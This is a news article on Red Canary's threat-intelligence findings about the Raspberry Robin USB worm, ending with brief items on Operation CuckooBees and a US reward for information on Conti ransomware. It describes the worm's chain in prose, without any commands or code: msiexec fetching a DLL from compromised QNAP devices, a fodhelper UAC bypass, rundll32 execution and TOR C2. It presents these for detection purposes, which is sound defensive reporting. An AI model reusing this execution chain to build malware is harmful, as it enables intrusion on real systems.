Raspberry Robin worm spreads through USB drives targets technology, manufacturing organizations

Red Canary Intelligence has been tracking a cluster of malicious activity that it calls ‘Raspberry Robin’ and observed to target organizations with ties to technology and manufacturing, though it’s not yet clear if there are other links among victims. The researchers are tracking the worm spread by external drives that leverage Windows Installer to reach out to QNAP-associated domains and download a malicious DLL.

“‘Raspberry Robin’ is Red Canary’s name for a cluster of activity we first observed in September 2021 involving a worm that is often installed via USB drive,” Red Canary researchers wrote in a company blog post. “This activity cluster relies on msiexec.exe to call out to its infrastructure, often compromised QNAP devices, using HTTP requests that contain a victim’s user and device names,” they added.

The researchers also observed that Raspberry Robin uses TOR exit nodes as additional command and control (C2) infrastructure. “Like most activity clusters we track, Raspberry Robin began as a handful of detections with similar characteristics that we saw in multiple customers’ environments, first noticed by Jason Killam from Red Canary’s Detection Engineering team,” the researchers wrote. “We saw Raspberry Robin activity as far back as September 2021, though most related activities occurred during or after January 2022. As we observed additional activity, we couldn’t find public reporting to corroborate our analysis, aside from some findings on VirusTotal that we suspected were related based on overlap in C2 domains,” they added.

While Red Canary has so far observed Raspberry Robin in organizations with ties to technology and manufacturing, the researchers “have several intelligence gaps around this cluster, including the operators’ objectives. While we don’t yet have the full picture, we want to share what we know about this activity cluster so far to enrich collective understanding of this threat and empower defenders to identify this activity,” they said.

As part of the cluster name Raspberry Robin, the researchers observed an entire chain of activity, including the initial access method, the worm itself, and the follow-on execution and C2 activity.

Red Canary researchers disclosed that Raspberry Robin uses cmd[dot]exe to read and execute a file stored on the infected external drive while leveraging msiexec[dot]exe for external network communication to a rogue domain used as C2 to download and install a DLL library file. Subsequently, “msiexec[dot]exe launches a legitimate Windows utility, fodhelper[dot]exe, which in turn spawns rundll32[dot]exe to execute a malicious command. Processes launched by fodhelper[dot]exe run with elevated administrative privileges without requiring a User Account Control prompt,” they added.

It is unusual for fodhelper[dot]exe to spawn any processes as the parent, making this another useful detection opportunity, according to the researchers.

The researchers also observed “outbound C2 activity involving the processes regsvr32[dot]exe, rundll32[dot]exe, and dllhost[dot]exe executing without any command-line parameters and making external network connections to IP addresses associated with TOR nodes. Additionally, some of the IP addresses in the connections host domains consist of random alphanumeric characters,” they added.

Red Canary said it did not know “how or where Raspberry Robin infects external drives to perpetuate its activity, though it’s likely this occurs offline or otherwise outside of our visibility. We also don’t know why Raspberry Robin installs a malicious DLL. One hypothesis is that it may be an attempt to establish persistence on an infected system, though additional information is required to build confidence in that hypothesis, the researchers added.

“Perhaps our biggest question concerns the operators’ objectives. Absent additional information on later-stage activity, it’s difficult to make inferences on the goal or goals of these campaigns,” according to the researchers.

Last week, Cybereason released research on Operation CuckooBees, a 12-month investigation into Winnti Group’s (APT 41) global cyber espionage campaign, marking the cyberattack as ‘one of the largest IP theft campaigns of its kind coming from China.’ The hackers have operated with the goal of stealing sensitive proprietary information from technology and manufacturing companies mainly in East Asia, Western Europe, and North America in the defense, energy, aerospace, biotech, and pharma industries.

The intelligence of various cyberespionage threat groups comes at the same time as the U.S. Department of State raised the stakes by announcing that is making reward offers for information to bring Conti ransomware variant co-conspirators to justice. A total reward of US$15 million has been announced for details of the Conti ransomware group, which has been responsible for hundreds of ransomware incidents over the past two years. 

The FBI estimates that as of January this year, “there had been over 1,000 victims of attacks associated with Conti ransomware with victim payouts exceeding $150,000,000, making the Conti Ransomware variant the costliest strain of ransomware ever documented,” the State Department said.

The U.S. government is offering up to $10 million for information on Conti leaders’ identity and location, and an additional $5 million for details leading to the arrest and/or conviction of any individual in any country conspiring to participate in or attempting to participate in a Conti variant ransomware incident.

Anna Ribeiro

Industrial Cyber News Editor. Anna Ribeiro is a freelance journalist with over 14 years of experience in the areas of security, data storage, virtualization and IoT.